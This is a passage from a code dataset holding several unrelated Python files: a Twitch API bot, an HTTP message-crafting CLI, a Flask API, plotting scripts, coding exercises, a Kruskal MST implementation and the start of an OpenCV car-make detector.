self.html_link_extractor.links_to_follow(htmlregion):\n request = self._filter_link(link, seen)\n if request is not None:\n yield request\n\n def handle_xml(self, response, seen):\n _type = XML_APPLICATION_TYPE(response.headers.get('Content-Type', ''))\n _type = _type.groupdict()['type'] if _type else 'xml'\n try:\n link_extractor = create_linkextractor_from_specs({\n 'type': _type, 'value': ''\n })\n except ValueError:\n link_extractor = SitemapLinkExtractor()\n for link in link_extractor.links_to_follow(response):\n request = self._filter_link(link, seen)\n if request:\n yield request\n","sub_path":"slybot/slybot/plugins/scrapely_annotations/annotations.py","file_name":"annotations.py","file_ext":"py","file_size_in_byte":8372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"523155541","text":"# lbot_twitch.py\n\nimport os\nfrom dotenv import load_dotenv\n\nimport requests\n\nfrom secrets import token_hex\nimport hmac\nimport hashlib\nimport json\nimport time\nimport base64\n\nimport lbot_helpers as lh\n\nload_dotenv()\n\n# Load env vars from os.\ntry:\n CALLBACK_URL = os.getenv(\"CALLBACK_URL\")\nexcept:\n print(\"Error: No callback URL found in environment variables!\")\n raise EnvironmentError\n\ntry:\n TWITCH_CLIENT_ID = os.getenv(\"TWITCH_CLIENT_ID\")\nexcept:\n print(\"Error: No Twitch API Client ID found in environment variables!\")\n raise EnvironmentError\n\ntry:\n TWITCH_CLIENT_SECRET = os.getenv(\"TWITCH_CLIENT_SECRET\")\nexcept:\n print(\"Error: No Twitch API Client secret found in environment variables!\")\n raise EnvironmentError\n\ntry:\n TWITCH_APP_TOKEN = os.getenv(\"TWITCH_APP_TOKEN\")\nexcept:\n print(\"Error: No current app token found in environment variables!\")\n raise EnvironmentError\n\nTWITCH_API = \"https://api.twitch.tv/helix\"\n\n\n# Gets a new app token from the twitch auth service.\ndef get_twitch_token():\n # Right now, we have to renew the app token by hand every 60 days.\n # TODO: Auto-renewal of app access token.\n\n TWITCH_AUTH_URL = \"https://id.twitch.tv/oauth2/token\"\n params = {\n \"client_id\": TWITCH_CLIENT_ID,\n \"client_secret\": TWITCH_CLIENT_SECRET,\n \"grant_type\": \"client_credentials\",\n }\n\n try:\n request = requests.post(TWITCH_AUTH_URL, params=params)\n response = request\n except:\n raise lh.APIError(\n response.status_code,\n TWITCH_AUTH_URL,\n response.headers,\n response.reason,\n response.text,\n )\n\n return response\n\n\n# Revokes an app token that was issued to us.\ndef revoke_twitch_token(token):\n TWITCH_REVOKE_URL = \"https://id.twitch.tv/oauth2/revoke\"\n params = {\"client_id\": TWITCH_CLIENT_ID, \"token\": token}\n\n try:\n request = requests.post(TWITCH_REVOKE_URL, params=params)\n response = request\n except:\n raise lh.APIError(\n response.status_code,\n TWITCH_REVOKE_URL,\n response.headers,\n response.reason,\n response.text,\n )\n\n print(response)\n return response\n\n\n# TODO: renew_twitch_token function, storing tokens in file\n\n\n# Gets user id by name from the Helix/Get-Users endpoint.\ndef get_user_id(name):\n url = TWITCH_API + \"/users\"\n\n try:\n params = {\"login\": name}\n header = {\n \"Content-Type\": \"application/json\",\n \"Client-ID\": TWITCH_CLIENT_ID,\n \"Authorization\": f\"Bearer {TWITCH_APP_TOKEN}\",\n }\n\n request = requests.get(url=url, headers=header, params=params)\n response = request\n\n # print(response.json) # DEBUGGING\n user_id = response.json()[\"data\"][0][\"id\"]\n except IndexError:\n raise lh.InputError(message=\"User 
not found.\")\n except:\n raise lh.APIError(\n response.status_code, url, response.headers, response.reason, response.text\n )\n\n return user_id\n\n\n# Gets game name by id from the Helix/Get-Games endpoint.\ndef get_game_name(game_id):\n url = TWITCH_API + \"/games\"\n\n # Right now, we have to renew the app token by hand every 60 days.\n # TODO: Auto-renewal of app access token.\n\n try:\n params = {\"id\": game_id}\n header = {\n \"Content-Type\": \"application/json\",\n \"Client-ID\": TWITCH_CLIENT_ID,\n \"Authorization\": f\"Bearer {TWITCH_APP_TOKEN}\",\n }\n\n request = requests.get(url=url, headers=header, params=params)\n response = request\n\n try:\n # print(response.json) # DEBUGGING\n game_name = response.json()[\"data\"][0][\"name\"]\n except IndexError:\n print(\"No name data in API response.\")\n game_name = \"\"\n\n except:\n raise lh.APIError(\n response.status_code, url, response.headers, response.reason, response.text\n )\n\n return game_name\n\n\n# Establishes webhook with twitch API. Web module will return challenge and act as callback/handle incoming notifications.\ndef twitch_sub2webhook(mode, topic, lease):\n callback_target = CALLBACK_URL + \"/twitchapi/webhooks/callback/\"\n TWITCH_WEBHOOK_HUB = TWITCH_API + \"/webhooks/hub/\"\n\n # temp_secret = token_hex(nbytes=8)\n # temp_secret = '' # DEBUGGING\n # os.environ['TEMP_SECRET'] = temp_secret # Causes problems on heroku\n # TODO: Store fresh TEMP_KEY in file and hand over to lbot_web.py for signature verification.\n\n try:\n load_dotenv()\n temp_secret = os.environ[\"TEMP_SECRET\"]\n # print(temp_secret) # DEBUGGING\n except:\n print(\"No temporary secret found in environment variables.\")\n raise EnvironmentError\n\n params = {\n \"hub.mode\": mode,\n \"hub.topic\": TWITCH_API + topic,\n \"hub.callback\": callback_target,\n \"hub.lease_seconds\": lease,\n \"hub.secret\": temp_secret,\n }\n\n header = {\n \"Content-Type\": \"application/json\",\n \"Client-ID\": TWITCH_CLIENT_ID,\n \"Authorization\": f\"Bearer {TWITCH_APP_TOKEN}\",\n }\n\n request = requests.post(TWITCH_WEBHOOK_HUB, headers=header, params=params)\n response = request\n\n # print(params, header) # DEBUGGING\n # print(response) # DEBUGGING\n # print(response.reason) # DEBUGGING\n return response\n","sub_path":"lbot_twitch.py","file_name":"lbot_twitch.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"161455428","text":"from sys import stdin, argv\nfrom argparse import ArgumentParser\n\nfrom fn.cli import *\nfrom fn.http.messages import request, response, parseRequest, parseResponse\nfrom fn.http.pairs import setValuesByName\n\nREQUEST = 0x01\nRESPONSE = 0x00\n# TODO PIPELINE = 0x80, REQUEST_PIPELINE = REQUEST|PIPELINE, ...\n\nclass Command(object):\n \"\"\"\n Shell command exercising flintnapper's API.\n \"\"\"\n\n prog = \"fn\"\n desc = \"flintnapper (fn) - Craft, parse, and modify HTTP messages.\"\n epilog = \"For source, docs, bug, etc: \" + \\\n \"https://github.com/xmnr/flintnapper\"\n\n defaultRequest = request()\n defaultResponse = response()\n\n def parseArguments(self, arguments):\n\n parser = self.makeArgParser()\n arguments = parser.parse_args(arguments)\n return parser, arguments\n\n def load(self, arguments):\n \"\"\"\n Looks through the arguments to find directives specifying the message\n (ie, -M, --stdin, etc). 
If none are found, the defaultRequest/\n defaultResponse are used.\n \"\"\"\n\n request = arguments.messageType == REQUEST\n type = \"request\" if request else \"response\"\n if arguments.message:\n if request: message = parseRequest(arguments.message)\n else: message = parseResponse(arguments.message)\n elif arguments.stdin:\n info(\n \"Reading {} from stdin\".format(type),\n arguments.verbose\n )\n if request: message = readRequest()\n else: message = self.readResponse()\n elif arguments.file:\n info(\n \"Reading {} from {}\".format(type, arguments.file),\n arguments.verbose\n )\n f = open(arguments.file, \"r\")\n if request: message = readRequest(f)\n else: message = self.readResponse(f)\n else:\n if request: message = self.defaultRequest\n else: message = self.defaultResponse\n\n return message\n\n def alter(self, message, arguments):\n \"\"\"\n Performs operations specified in the arguments to modify the message in\n whatever way.\n \"\"\"\n\n message = message.copy()\n\n # Entity\n\n if arguments.entity:\n message[\"entity\"] = arguments.entity\n if arguments.readEntity:\n message[\"entity\"] = open(arguments.readEntity, \"r\").read()\n if arguments.entityStdin:\n message[\"entity\"] = stdin.read()\n if arguments.appendEntity:\n message[\"entity\"] += arguments.appendEntity\n if arguments.appendEntityStdin:\n message[\"entity\"] += stdin.read()\n if arguments.appendEntityFile:\n message[\"entity\"] += open(arguments.appendEntityFile, \"r\").read()\n\n # Top-line\n\n if arguments.version:\n message[\"version\"] = arguments.version\n if arguments.method:\n message[\"method\"] = arguments.method.upper()\n if arguments.path:\n message[\"path\"] = arguments.path\n if arguments.status:\n message[\"status\"] = arguments.status\n if arguments.reason:\n message[\"reason\"] = arguments.reason.upper()\n\n # Headers\n\n for header in arguments.header:\n message[\"headers\"] = setValuesByName(message[\"headers\"], *header)\n if arguments.host:\n message[\"headers\"] = setValuesByName(message[\"headers\"], \"Host\", arguments.host)\n if arguments.auto: # obviously must come after entity\n message[\"headers\"] = setValuesByName(\n message[\"headers\"],\n \"Content-length\",\n str(len(message[\"entity\"]))\n )\n\n return message \n\n def execute(self, argv=argv, test=False):\n\n parser, arguments = self.parseArguments(argv[1:])\n exitCode = SUCCESS\n message = None\n try:\n arguments = self.checkSanity(arguments)\n message = self.alter(self.load(arguments), arguments)\n \n if arguments.messageType == RESPONSE and arguments.verboseExitCode:\n status = message[\"status\"]\n # FIXME these magic values should come from fn.http\n if status.startswith(\"2\"): exitCode = SUCCESS\n elif status.startswith(\"1\"): exitCode = INFORMATION\n elif status.startswith(\"3\"): exitCode = REDIRECT\n elif message[\"status\"].startswith(\"4\"): exitCode = CLIENT_ERROR\n elif message[\"status\"].startswith(\"5\"): exitCode = SERVER_ERROR\n else: exitCode = UNKNOWN_ERROR\n\n except ArgumentError as e:\n error(e.message)\n exitCode = ARGUMENT_ERROR\n\n if test:\n return message, exitCode\n else:\n writeMessage(message)\n exit(exitCode)\n\n # Arguments\n\n def makeArgParser(self):\n\n parser = ArgumentParser(\n prog = self.prog,\n description = self.desc,\n epilog = self.epilog,\n add_help = False,\n )\n\n # Input\n parser.add_argument(\"-M\", \"--message\", metavar=\"httpMessage\",\n help=\"Specify an HTTP message (a request or response) from the command line.\")\n parser.add_argument(\"-s\", \"--stdin\", 
action=\"store_true\", help=\"Read a message from stdin.\")\n parser.add_argument(\"-f\", \"--file\", help=\"Read a message from a file.\")\n parser.add_argument(\"-rQ\", \"--request\", action=\"store_const\", dest=\"messageType\",\n const=REQUEST, help=\"Parse message as a request.\")\n parser.add_argument(\"-rP\", \"--response\", action=\"store_const\", dest=\"messageType\", const=RESPONSE,\n help=\"Parse message as a response.\")\n # TODO format string input. -MF, --fromFormat\n # TODO pipelines. -P, --pipeline | --duplex for pipelines with requests & responses\n # Operations\n parser.add_argument(\"-h\", \"--header\", metavar=(\"key\", \"value\"), nargs=2, action=\"append\", default=[],\n help=\"Change the value of a header, append it if it isn't found. Can be used many times.\")\n parser.add_argument(\"-C\", \"--adjustContentLen\", action=\"store_true\",\n help=\"Adjust the Content-length for the attached entity.\", dest=\"auto\")\n parser.add_argument(\"-H\", \"--host\", metavar=\"hostname\", help=\"Set the Host header.\")\n parser.add_argument(\"-e\", \"--entity\", metavar=\"string\",\n help=\"Set the entity. Does not update the content length (use -C for that).\")\n parser.add_argument(\"-eS\", \"--entityStdin\", action=\"store_true\", help=\"Read stdin into the entity.\")\n parser.add_argument(\"-eF\", \"--readEntity\", metavar=\"file\", help=\"Read a file into the entity.\")\n parser.add_argument(\"-eA\", \"--appendEntity\", metavar=\"string\", help=\"Append a string to the entity.\")\n parser.add_argument(\"-eAS\", \"--appendEntityStdin\", help=\"Append the contents of stdin to entity.\", action=\"store_true\")\n parser.add_argument(\"-eAF\", \"--appendEntityFile\", metavar=\"file\", help=\"Append the contents of a file to entity.\")\n parser.add_argument(\"-v\", \"--version\", metavar=\"httpVersion\", help=\"Set the HTTP version (ie, -v HTTP/1.1).\")\n parser.add_argument(\"--0.9\", \"--HTTP/0.9\", const=\"HTTP/0.9\", action=\"store_const\", dest=\"version\")\n parser.add_argument(\"--1.0\", \"--HTTP/1.0\", const=\"HTTP/1.0\", action=\"store_const\", dest=\"version\")\n parser.add_argument(\"--1.1\", \"--HTTP/1.1\", const=\"HTTP/1.1\", action=\"store_const\", dest=\"version\")\n parser.add_argument(\"-m\", \"--method\", metavar=\"method\")\n parser.add_argument(\"--get\", const=\"GET\", action=\"store_const\", dest=\"method\")\n parser.add_argument(\"--post\", const=\"POST\", action=\"store_const\", dest=\"method\")\n parser.add_argument(\"--head\", const=\"HEAD\", action=\"store_const\", dest=\"method\")\n parser.add_argument(\"--options\", const=\"OPTIONS\", action=\"store_const\", dest=\"method\")\n parser.add_argument(\"--trace\", const=\"TRACE\", action=\"store_const\", dest=\"method\")\n parser.add_argument(\"-p\", \"--path\", metavar=\"path\", help=\"Set the request path.\")\n parser.add_argument(\"-S\", \"--status\", metavar=\"statusCode\")\n parser.add_argument(\"--200\", const=\"200\", action=\"store_const\", dest=\"status\")\n parser.add_argument(\"--404\", const=\"404\", action=\"store_const\", dest=\"status\")\n parser.add_argument(\"--500\", const=\"500\", action=\"store_const\", dest=\"status\")\n parser.add_argument(\"-r\", \"--reason\", metavar=\"reasonString\")\n parser.add_argument(\"--ok\", const=\"OK\", action=\"store_const\", dest=\"reason\")\n parser.add_argument(\"--not-found\", const=\"Not Found\", action=\"store_const\", dest=\"reason\")\n parser.add_argument(\"--internal-error\", const=\"Internal Server Error\", action=\"store_const\", 
dest=\"reason\")\n # TODO make a way for values that are normalized (ie, status) to be case sensitive (-c, --case, --case-sensitive)\n # TODO omit the top line\n # TODO URLs\n # TODO select messages in pipeline. -N n, --inPipeline n.\n # TODO zipper together request pipelines & response pipelines into duplex pipelines\n # Output\n # TODO format string output. -OF, --toFormat\n # TODO pipeline count. --count.\n # Misc\n parser.add_argument(\"-V\", \"--verbose\", action=\"store_true\",\n help=\"Display warnings & info.\")\n parser.add_argument(\"-vE\", \"--verboseExitCode\", action=\"store_true\",\n help=\"When parsing a response, use the exit code to indicate the status code.\"\n )\n parser.add_argument(\"-?\", \"--help\", action=\"help\", help=\"Display this help text.\")\n # TODO help for format schemas\n\n return parser\n\n def checkSanity(self, arguments):\n \"\"\"\n Raises an ArgumentError if arguments are in conflict with each other,\n and makes sure arguments.messageType is set.\n\n If it hasn't been specified by the command line, it's value is guessed\n based on the presence of arguments for altering the method or path vs.\n status or reason. If it cannot be determined, it defaults to parsing the\n message as a request.\n \"\"\"\n\n requestArgs = (arguments.method or arguments.path)\n responseArgs = (arguments.status or arguments.reason)\n if arguments.messageType is None:\n if requestArgs: arguments.messageType = REQUEST\n elif responseArgs: arguments.messageType = RESPONSE\n else:\n info(\"Warning: unable to deduce message type \" + \\\n \"(default is request).\", arguments.verbose)\n arguments.messageType = REQUEST\n if (\n (arguments.messageType == REQUEST and responseArgs) or \\\n (arguments.messageType == RESPONSE and requestArgs)\n ):\n raise ArgumentError(\"Message type conflict.\")\n \n\n if map(\n bool,\n (\n arguments.stdin,\n arguments.entityStdin, \n arguments.appendEntityStdin\n )\n ).count(True) > 1:\n\n raise ArgumentError(\"Only one argument can read from stdin.\")\n\n return arguments\n\ndef execute(*args):\n\n args = (\"fn\", ) + args\n return Command().execute(args, test=True)\n","sub_path":"fn/cli/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":11341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"478067725","text":"# 안정적인 문자열 - S1\n\nimport sys\n\ndef stable(data,num):\n ans=0\n stack=list()\n\n for i in data:\n if i=='{':\n stack.append(i)\n else:\n if len(stack)==0 or stack[-1]=='}':\n stack.append(i)\n else:\n stack.pop()\n\n if len(stack)>0:\n for i in range(0,len(stack),2):\n w1,w2=stack[i], stack[i+1]\n\n if w1==w2:\n ans+=1\n else:\n ans+=2\n \n print(str(num)+'.',ans)\n\n\nif __name__==\"__main__\": \n case=1\n\n while True:\n sentence=sys.stdin.readline().rstrip();\n\n if '-' in sentence:\n break\n else:\n stable(sentence,case)\n case+=1\n ","sub_path":"String/BOJ_4889.py","file_name":"BOJ_4889.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"361433936","text":"import numpy as np\r\nfrom scipy import stats\r\nfrom scipy.optimize import curve_fit\r\nimport matplotlib.pyplot as plt\r\nimport uncertainties.unumpy as unp\r\n\r\nX = np.genfromtxt('build/2a1.temp')\r\n\r\n\r\ny = np.linspace(0,2,1000)\r\nplt.cla()\r\nplt.clf()\r\nplt.hist(X, label='Zufallszahlen',normed=True,bins=100)\r\nplt.plot(y,np.cos(y),label='$\\cos(y)$')\r\n#plt.plot(f(R2,*params), R2, 'r-', 
label='fit')\r\nplt.xlim(0,np.pi/2)\r\nplt.ylim(0,1)\r\nplt.xlabel(r'$y$')\r\n#plt.ylabel(r'$R$')\r\nplt.legend(loc='best')\r\nplt.tight_layout(pad=0, h_pad=1.08, w_pad=1.08)\r\nplt.savefig('build/2a1.pdf')\r\n\r\n\r\n\r\nX = np.genfromtxt('build/2a2.temp')\r\n\r\n\r\ny = np.linspace(-2,2,1000)\r\nplt.cla()\r\nplt.clf()\r\nplt.hist(X, label='Zufallszahlen',normed=True,bins=100)\r\nplt.plot(y,np.cos(y)/2,label='$\\cos(y) / 2$')\r\n#plt.plot(f(R2,*params), R2, 'r-', label='fit')\r\nplt.xlim(-np.pi/2,np.pi/2)\r\nplt.ylim(0,1)\r\nplt.xlabel(r'$y$')\r\n#plt.ylabel(r'$R$')\r\nplt.legend(loc='best')\r\nplt.tight_layout(pad=0, h_pad=1.08, w_pad=1.08)\r\nplt.savefig('build/2a2.pdf')\r\n\r\nX = np.genfromtxt('build/2b.temp')\r\ny = np.linspace(-5,11,1000)\r\n\r\n#y = np.linspace(-2,2,1000)\r\nplt.cla()\r\nplt.clf()\r\nplt.hist(X, label='Zufallszahlen',normed=True,bins=100)\r\nplt.plot(y,1/np.sqrt(8*np.pi)*np.exp(-(y-3)*(y-3)/8),label='Gauß-Verteilung')\r\n#plt.plot(f(R2,*params), R2, 'r-', label='fit')\r\nplt.xlim(-5,11)\r\nplt.ylim(0,1)\r\nplt.xlabel(r'$y$')\r\n#plt.ylabel(r'$R$')\r\nplt.legend(loc='best')\r\nplt.tight_layout(pad=0, h_pad=1.08, w_pad=1.08)\r\nplt.savefig('build/2b.pdf')\r\n\r\nX = np.genfromtxt('build/2c.temp')\r\n\r\ndef g(x):\r\n\ttemp = []\r\n\tfor value in x:\r\n\t\tif(value<3):\r\n\t\t\ttemp.append(np.exp((value - 3)))\r\n\t\telse:\r\n\t\t\ttemp.append(np.exp(-(value - 3)))\r\n\ttemp = np.array(temp)\r\n\treturn temp\r\n\r\ndef g2(x):\r\n\treturn np.exp(-np.abs(x - 3))\r\n\r\n\r\ny = np.linspace(-2,8,1000)\r\nplt.cla()\r\nplt.clf()\r\nplt.hist(X, label='Zufallszahlen',normed=True,bins=100)\r\nplt.plot(y,1/np.sqrt(2*np.pi)*np.exp(-(y-3)*(y-3)/2),label='Gauß-Verteilung')\r\nplt.plot(y,np.exp(0.5)/np.sqrt(2*np.pi)*g2(y),label='$k \\cdot g(x)$')\r\n#plt.plot(f(R2,*params), R2, 'r-', label='fit')\r\nplt.xlim(-2,8)\r\nplt.ylim(0,1)\r\nplt.xlabel(r'$x$')\r\n#plt.ylabel(r'$R$')\r\nplt.legend(loc='best')\r\nplt.tight_layout(pad=0, h_pad=1.08, w_pad=1.08)\r\nplt.savefig('build/2c.pdf')\r\n\r\n\r\n","sub_path":"Blatt02/Aufgabe2.py","file_name":"Aufgabe2.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"254497376","text":"from flask import Flask,request\r\nfrom flask_restful import Api, Resource,reqparse\r\n\r\napp = Flask(__name__)\r\napi = Api(app)\r\n\r\nvideos_put_args = reqparse.RequestParser()\r\nvideos_put_args.add_argument(\"name\", type=str,help=\"name of the video\",required=True)\r\nvideos_put_args.add_argument(\"views\",type=int,help=\"Views of the video\",required=True)\r\nvideos_put_args.add_argument(\"likes\",type=int ,help=\"Likes on the video\",required=True)\r\n\r\nvideos= {}\r\n\r\nclass Video(Resource):\r\n    def get(self,video_id):\r\n        return videos[video_id]\r\n    def put(self,video_id):\r\n        args = videos_put_args.parse_args()\r\n        videos[video_id]= args\r\n        return videos[video_id],201\r\n\r\n\r\napi.add_resource(Video,'/video/<int:video_id>')\r\n\r\n\r\nif __name__ == '__main__':\r\n    app.run(debug=True)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"201727217","text":"'''\nReturns total price paid for individual rentals.\n\nTesting for possible fault and exiting the loop to continue on.\nCurrent implementation will stop processing after first fault.\n'''\nimport argparse\nimport json\nimport datetime\nimport math\nimport logging\nimport 
sys\n\nLOG_FORMAT = \"%(asctime)s %(filename)s:%(lineno)-3d %(levelname)s %(message)s\"\nLOG_FILE = datetime.datetime.now().strftime(\"%Y-%m-%d\")+'.log'\nFORMATTER = logging.Formatter(LOG_FORMAT)\n\nFH = logging.FileHandler(LOG_FILE)\nCH = logging.StreamHandler()\nFH.setFormatter(FORMATTER)\nCH.setFormatter(FORMATTER)\n\nLOGGER = logging.getLogger()\nLOGGER.setLevel(logging.DEBUG)\nLOGGER.addHandler(FH)\nLOGGER.addHandler(CH)\n\n\ndef parse_cmd_arguments():\n    '''Parse Command Line Arguments.'''\n    parser = argparse.ArgumentParser(description='Process some integers.')\n    parser.add_argument('-i', '--input', help='input JSON file', required=True)\n    parser.add_argument('-o', '--output', help='output JSON file', required=True)\n    parser.add_argument('-d', '--debug', help='debug level', type=int,\n                        default=0, choices=range(4), required=False)\n    return parser.parse_args()\n\n\ndef load_rentals_file(filename):\n    '''load data from file.'''\n    with open(filename) as file:\n        try:\n            logging.debug(\"Loading %s.\", filename)\n            data = json.load(file)\n            logging.debug(\"Loaded %s.\", filename)\n        except FileNotFoundError:\n            logging.error(\"Failed to load input json file %s.\", filename)\n            sys.exit(0)\n    logging.debug(\"Loaded %s entries.\", len(data))\n    return data\n\n\ndef calculate_additional_fields(data):\n    '''Make additional field calculations.'''\n    for value in data.values():\n        try:\n            #if logging level > a given level for grouped logging evaluations.\n            #would reduce calls to if statements to one.\n            if not value['rental_start']:\n                #Missing source data, resulting in an error.\n                logging.error(\"Start date is missing for %s.\", value['product_code'])\n                continue\n            if not value['rental_end']:\n                #Log warning if end date is missing\n                logging.warning(\"End date is missing for %s.\", value['product_code'])\n                logging.debug(\"%s\", value)\n                #skip calculations if end date is missing.\n                continue\n            if value['units_rented'] < 1:\n                logging.warning(\"Units rented of %s is less than one.\", value['product_code'])\n                continue\n            rental_start = datetime.datetime.strptime(value['rental_start'], '%m/%d/%y')\n            rental_end = datetime.datetime.strptime(value['rental_end'], '%m/%d/%y')\n            if rental_start > rental_end:\n                #incorrect result, therefore an error.\n                logging.error(\"Rental end is before rental start for %s.\", value['product_code'])\n                #avoid except clause for this condition.\n                continue\n            value['total_days'] = (rental_end - rental_start).days\n\n            #Dataset is unclear, but logically price_per_day should be for one unit.\n            #But price_per_day could be for units_rented.\n            #Code suggests this given the unit_cost calculation.\n            value['total_price'] = value['total_days'] * value['price_per_day']\n\n            #Pointless line that highlights the negative days error.\n            value['sqrt_total_price'] = math.sqrt(value['total_price'])\n            value['unit_cost'] = value['total_price'] / value['units_rented']\n        except: # pylint: disable=W0702\n            logging.error(\"Hit unknown error in calculate_additional_fields.\")\n            logging.error(\"%s\", value)\n            continue\n    # exit(0)\n\n    return data\n\n\ndef save_to_json(filename, data):\n    '''Save output file function.'''\n    try:\n        logging.debug(\"Writing output file to %s.\", filename)\n        with open(filename, 'w') as file:\n            json.dump(data, file)\n        logging.debug(\"Wrote output file to %s.\", filename)\n    except IOError as io_error:\n        logging.error(\"Failed to write output file to %s.\", filename)\n        logging.error(\"%s\", dir(io_error))\n\n\nif __name__ == \"__main__\":\n    ARGS = parse_cmd_arguments()\n    LEVEL = ARGS.debug\n    if LEVEL == 
0:\n        #Disable logging\n        LOGGER.disabled = True\n    elif LEVEL == 1:\n        FH.setLevel(logging.ERROR)\n        CH.setLevel(logging.ERROR)\n    elif LEVEL == 2:\n        FH.setLevel(logging.WARNING)\n        CH.setLevel(logging.WARNING)\n    elif LEVEL == 3:\n        FH.setLevel(logging.WARNING)\n        CH.setLevel(logging.DEBUG)\n\n    logging.debug(\"Input file provided: %s.\", ARGS.input)\n    logging.debug(\"Output file provided: %s.\", ARGS.output)\n    logging.debug(\"Debug level is %s.\", ARGS.debug)\n\n    logging.error(\"Generate an error.\")\n\n    DATA = load_rentals_file(ARGS.input)\n    DATA = calculate_additional_fields(DATA)\n    save_to_json(ARGS.output, DATA)\n","sub_path":"students/smckellips/lesson02/assignment/code/charges_calc.py","file_name":"charges_calc.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"95861184","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun  4 14:24:45 2019\n\n@author: akmil\n\"\"\"\n\n'''\nExercise 2: Write a program to look for lines of the form:\nNew Revision: 39772\nExtract the number from each of the lines using a regular expression\nand the findall() method. Compute the average of the numbers and\nprint out the average.\nEnter file:mbox.txt\n38444.0323119\nEnter file:mbox-short.txt\n39756.9259259\n'''\n\nimport re\n\nfilename = input('Enter a filename: ')\ncount = 0\nlst = list()\ntotal = 0\n\nwith open(filename, 'r') as f:\n    for line in f:\n        line = line.rstrip()\n        if re.search('New Revision: [0-9]+', line):\n            total += int(list.pop(re.findall('New Revision: ([0-9]+)', line)))\n            count += 1\n        else :\n            continue\nprint(f\"Revision avg: {round(total/count, 7)}\")\n","sub_path":"Assignment4/11_2_excercise.py","file_name":"11_2_excercise.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"526213153","text":"#Question 3\r\n\r\nclass Graph:\r\n    def __init__(self, vertices):#creates a graph when writing e.g. Graph(6); in particular, the number of vertices must be given\r\n        self.V = vertices\r\n        self.graph = []\r\n\r\n    def add_edge(self, u, v, w):#adds an edge between vertices u and v with weight w\r\n        self.graph.append([u, v, w])\r\n\r\n    def find(self, parent, i):#Corresponds to the Find-Set(x) function presented in the course\r\n        if parent[i] == i:\r\n            return i\r\n        return self.find(parent, parent[i])\r\n\r\n    def apply_union(self, parent, rank, x, y):#Corresponds to the Union(x,y) function presented in the course\r\n        xroot = self.find(parent, x)\r\n        yroot = self.find(parent, y)\r\n        if rank[xroot] < rank[yroot]:\r\n            parent[xroot] = yroot\r\n        elif rank[xroot] > rank[yroot]:\r\n            parent[yroot] = xroot\r\n        else:\r\n            parent[yroot] = xroot\r\n            rank[xroot] += 1\r\n    \r\ng = Graph(6)\r\ng.add_edge(0, 1, 4)\r\ng.add_edge(0, 2, 4)\r\ng.add_edge(1, 2, 2)\r\ng.add_edge(1, 0, 4)\r\ng.add_edge(2, 0, 4)\r\ng.add_edge(2, 1, 2)\r\ng.add_edge(2, 3, 3)\r\ng.add_edge(2, 5, 2)\r\ng.add_edge(2, 4, 4)\r\ng.add_edge(3, 2, 3)\r\ng.add_edge(3, 4, 3)\r\ng.add_edge(4, 2, 4)\r\ng.add_edge(4, 3, 3)\r\ng.add_edge(5, 2, 2)\r\ng.add_edge(5, 4, 3)\r\n\r\ndef kruskal_algo(Graph):\r\n    result = []#Will store the result\r\n    i, e = 0, 0 #Indices used in the algorithm\r\n    \r\n    Graph.graph = sorted(Graph.graph, key=lambda item: item[2]) #Sort the edges by increasing weight, step 1)\r\n    parent = []\r\n    rank = []\r\n    \r\n    \r\n    for node in range(Graph.V):#This loop goes through all the vertices of the graph and creates a set for each 
of them\r\n        parent.append(node)\r\n        rank.append(0)\r\n    \r\n    #While the number of edges is less than V-1, our subgraph does not reach all the vertices -> keep going\r\n    while e < Graph.V - 1:\r\n        \r\n        u, v, w = Graph.graph[i] #self.graph contains the edges in increasing order of weight, we start with i = 0\r\n        i = i + 1                #then at the next iteration we will want the 2nd-lightest edge, so we \r\n                                 #increment.\r\n        \r\n        x = Graph.find(parent, u)#These 2 lines of code look up and store which set \r\n        y = Graph.find(parent, v)#u and v belong to.\r\n        \r\n        if x != y: #If u and v are already part of the Minimum Spanning Tree, i.e. u and v belong to the same set,\r\n                   #then we do not want to add this edge to the minimum spanning tree, hence the x != y\r\n            e = e + 1 #If u and v are in different sets, we have reached one more vertex, so we increment\r\n            result.append([u, v, w])#We add the new edge to the result\r\n            Graph.apply_union(parent, rank, x, y)#We merge the set containing v into the set containing u\r\n    for u, v, weight in result:\r\n        print(\"%d - %d: %d\" % (u, v, weight))#method that prints the result\r\n    \r\n    return result\r\n    \r\nkruskal_algo(g)","sub_path":"2022/week12/resources/Exercice3.py","file_name":"Exercice3.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"310920158","text":"import cv2\nimport os\nimport numpy as np\n\nclass Box():\n    def __init__(self,name, x, y, width, height,conf=0.0, mid_y = 0):\n        self.name = name\n        self.x = x\n        self.y = y\n        self.width = width\n        self.height = height\n        self.mid_y = mid_y\n        self.conf = conf\n\nnet_large=cv2.dnn.readNetFromCaffe(\"models/CGIM_make_large_loc.prototxt\",\"models/CGIM_make_large_loc3.caffemodel\")\nnet_small=cv2.dnn.readNetFromCaffe(\"models/CGIM_make_loc.prototxt\",\"models/CGIM_make_loc.caffemodel\")\n\ncharDic=[\"None\",\"Infiniti\",\"Lincoln\",\"Volkswagen\",\"Jeep\",\"Buick\",\"Volvo\",\"Hyundai\",\"Mercury\",\"Cadillac\",\n        \"Subaru\",\"Ford\",\"Mitsubishi\",\"Lexus\",\"Acura\",\"Chrysler\",\"Gmc\",\"Honda\",\"Nissan\",\"Isuzu\",\n        